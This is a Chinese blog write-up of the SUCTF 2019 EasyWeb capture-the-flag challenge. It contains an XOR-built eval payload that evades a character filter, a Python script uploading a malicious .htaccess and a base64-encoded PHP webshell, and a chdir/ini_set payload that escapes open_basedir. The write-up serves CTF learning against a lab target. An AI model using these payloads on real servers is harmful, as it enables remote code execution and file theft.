[SUCTF 2019]EasyWeb(bypass open_basedir)

最新推荐文章于 2023-11-27 12:16:04 发布
最新推荐文章于 2023-11-27 12:16:04 发布
阅读量218 收藏
点赞数 1
分类专栏: Buuctf刷题篇 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/121205441
版权 
<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

直接给了源码,快速看了一下,过滤了字母数字,有个get_the_flag()函数,然后最后执行eval,所以思路很显然就是绕过WAF,执行eval函数

再看get_the_flag()函数,是个文件上传点,三段检测,过滤了 .ph 后缀,还有 <? ,最后还会判断是否是图像头

第一步

首先先不管get_the_flag上传怎么绕过,先考虑怎么绕过 eval的检测,想办法去执行eval

知识点

想法是构造这样的形式去执行函数 ?_=$_GET[a]();&a=phpinfo
不知道大家记不记得在php中 ?_=${_GET}{a}() 等价于 $_GET[a]()
用 { }绕过了对 [ ]的检测,其次就是如何构造_GET去绕过对字母的检测
可以使用异或来替换,就像 1^2=2^1
<?php
$l = "";
$r = "";
$argv = str_split("_GET");	# 把 _GET拆开成数组
for($i=0;$i<count($argv);$i++){   
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);    ##进行异或         
        if($k == $argv[$i]){
            if($j<16){  
            #j如果小于16就代表只需一位即可表示,但是url要求是2位所以补个0
                $l .= "%ff";
                $r .= "%0" . dechex($j);
            }
            $l .= "%ff";
            $r .= "%" . dechex($j);
        }
    }
}
echo "\{$l^$r\}";
?>
// 输出结果 {%ff%ff%ff%ff^%A0%B8%BA%AB}

所以 {%ff%ff%ff%ff^%A0%B8%BA%AB} 就是我们构造出的 {_GET}

完整payload去测试一下phpinfo,成功回显
?_=${%A0%B8%BA%AB^%ff%ff%ff%ff}{%ff}();&%ff=phpinfo

eval可以被成功执行,那就成功一半了,现在就是要让eval去执行get_the_flag函数
在这里插入图片描述

第二步

import requests
import base64

htaccess = b"""
#define width 1337
#define height 1337 
AddType application/x-httpd-php .paidx
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_b6e4ebe3b596f721b7308036349a1ccf/shell.paidx"
"""
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['a']);?>")
url = "http://45a73175-c06e-41cc-b571-06eab34dd22a.node4.buuoj.cn:81/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"

data = {"upload": "Submit"}
files = {'file': ('.htaccess', htaccess, 'image/jpeg')}

response = requests.post(url=url, data=data, files=files)
print(response.text)

files = {'file': ('shell.paidx', shell, 'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

首先是先把我们的 shell 传上去,我对一句话进行了一下base64,其他编码也行,主要是绕过对<? 的检测
在这里插入图片描述
然后就是上传.htaccess ,把所有 .paidx后缀的文件解析成php文件,并且自动加载导入我们的shell
在这里插入图片描述
在这里插入图片描述
可以看到蚁剑是可以成功连上的,但是又有一个新的问题

就是我们没有权限去到根目录下找flag,只有一个假flag
在这里插入图片描述
在这里插入图片描述
到这就不会了,看了大师傅们的WP知道这里是做了open_basedir的限制

upload/tmp_86580586cfedc818f0ed1967b7bfe13d/shell.paidx?a=chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(file_get_contents('/THis_Is_tHe_F14g'));

首先构造一个相对可以上跳的open_basedir

我们这里有上跳的路径我们直接 chdir("img")

然后每次操作chdir("..")都会进一次open_basedir的比对由于相对路径的问题,每次open_basedir的补全都会上跳。

比如初始open_basedir为/a/b/c/d:

第一次chdir后变为/a/b/c,第二次chdir后变为/a/b,第三次chdir后变为/a 第四次chdir后变为/

那么这时候再进行ini_set,调整open_basedir为/即可通过php_check_open_basedir_ex的校验成功覆盖,导致我们可以bypass open_basedir。
在这里插入图片描述

paidx0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5056
简单绕过open_basedir 的几种方法
Bypass open_basedir
qq_44657899的博客
10-19 1486
文章目录利用chdir()与ini_set()组合Bypass利用glob://伪协议Bypass 利用chdir()与ini_set()组合Bypass payload: 获取目录: ?a=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_
bypass open_basedir
eT48_Sec
02-06 903
在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。 <?php /* titile: bypass open_basedir auth: eT48 */ header("Conten-type:text/html; charset:udf-8"); error_repor
绕过open_basedir
unexpectedthing的博客
07-02 1453
open_basedir绕过
突破open_basedir进行列举目录
weixin_43999372的博客
11-07 435
open_basedir open_basedirphp设置中为了防御php跨目录进行文件(目录)读写的方法,所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合,在定义了open_basedir以后,php可以读写的文件、目录都将被限制在这些目录中。 利用DirectoryIterator + Glob 直接列举目录 Dire...
Emac_EasyWeb.zip_lan8720
09-23
该源码实现了单片机为服务器,PC为客户端访问单片机上的资源
EasyWEB.rar_网络编程_Others_
08-11
EASY WEB MAC LPC1768 MICROCONTROLLER
easyweb_test_V2_0.tar.gz_C/C++_
08-12
Easyweb3 Software for interfacing TI s MSP430F149 with the Crystal CS8900A Ethernet controller IC.
LPC1788 EMAC_EasyWeb 程序
04-13
LPC1788 EMAC_EasyWeb 程序
layui easyweb iframe v3.1.8源码
12-08
[增加] 增加fixed方式的select,可用在表格、滚动弹窗中 [增加] 增加动态模板功能 [增加] 主页工作台、控制台的内容进行了补充完善 ...[增加] loading风格增加了一个layui简约样式 ...[优化] 切换tab自动刷新支持每个子...
symlink() open_basedir bypass 原理分析
eT48_Sec
01-05 1514
之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。 原文:http://cxsecurity.com/issue/WLB-2009110068 ok,先来了解一下什么是open_basediropen_basedirPHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。
Bypass open_basedir的方法
最新发布
rev1ve的博客
11-27 1234
指定在每个 PHP 脚本执行完毕后自动追加的文件,用php伪协议去读取我们编码过的马,其中木马添加00是为了满足解码字节倍数,然后就是文件头绕过。payload构造的注意点就是:要读的文件需要往前跨多少路径,就得创建多少层的子目录,然后输入多少个…题目是给了我们get_the_flag()函数的,对文件上传进行检测。,检测文件头,然后回显上传路径;symlink() 函数创建一个从指定名称连接的现存目标文件开始的符号连接。发现可以异或绕过,但是考虑限制长度,我们构造如下。本地测试一下,这里我设置的路径。
easyui框架之numberbox,数据回显
weixin_33968104的博客
07-02 237
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP绕过open_basedir限制操作文件的方法
lonmar的博客
11-25 1161
文章目录0x00 预备知识0x01 命令执行函数0x02 symlink()函数0x03 glob伪协议 作者:PureT 原文链接:https://www.jb51.net/article/141767.htm 0x00 预备知识 关于open_basedir open_basedirphp.ini中的一个配置选项 它可将用户访问文件的活动范围限制在指定的区域, 假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务
PHP getimagesize 函数 - 获取图像信息
CBDLL的博客
03-13 2242
PHP getimagesize 函数 getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。 getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及...
Thinkphp iis 上传图片报错(非法图像文件)问题解决办法!
路人小K
05-10 8465
报错:非法图像文件! 环境:iis7.5/fastcgi  php5.6.24  php.ini中 upload_tmp_dir  目录权限  都设置ok 首先我们看源码: /* 对图像文件进行严格检测 */ $ext = strtolower($file['ext']); if(in_array($ext, array('gif','jpg'
绕过open_basedir读文件脚本
weixin_34375233的博客
05-03 349
绕过open_basedir读文件脚本2016年11月13日 01:28:21阅读数:1221参加了一场2016年的sycsec感觉又学到不少东西废话不多说,首先啥是open_basediropen_basedir: 将用户可操作的文件限制在某目录下具体的设置方法可以参考:http://blog.csdn.net/white__cat/arti...
小记PHP7的disable_functions绕过以及open_basedir()跨路径访问
crispr的博客
02-17 1553
小记PHP7的disable_functions绕过以及open_basedir()跨路径访问 主要针对PHP7版本 disable_functions绕过 一般而言,利用漏洞控制 web 启动新进程 a.bin(即便进程名无法让我随意指定),a.bin 内部调用系统函数 b(),b() 位于系统共享对象 c.so 中,所以系统为该进程加载共 c.so,想法在 c.so 前优先加载可控的 c_e...
[D3CTF 2019]EasyWeb
07-28
- *3* [[SUCTF 2019]EasyWeb](https://blog.csdn.net/shinygod/article/details/124045024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值